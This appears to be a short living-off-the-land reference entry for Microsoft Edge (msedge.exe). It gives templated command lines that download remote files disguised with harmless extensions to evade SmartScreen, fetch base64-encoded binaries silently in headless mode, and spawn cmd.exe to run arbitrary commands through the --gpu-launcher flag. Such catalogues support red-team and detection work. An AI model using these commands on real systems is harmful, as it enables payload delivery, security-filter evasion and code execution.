Microsoft Edge browser
Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
msedge.exe {REMOTEURL:.exe.txt}
Edge will silently download the file. File extension should be .html and binaries should be encoded.
msedge.exe --headless --enable-logging --disable-gpu --dump-dom "{REMOTEURL:.base64.html}" > {PATH:.b64}
Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command
msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"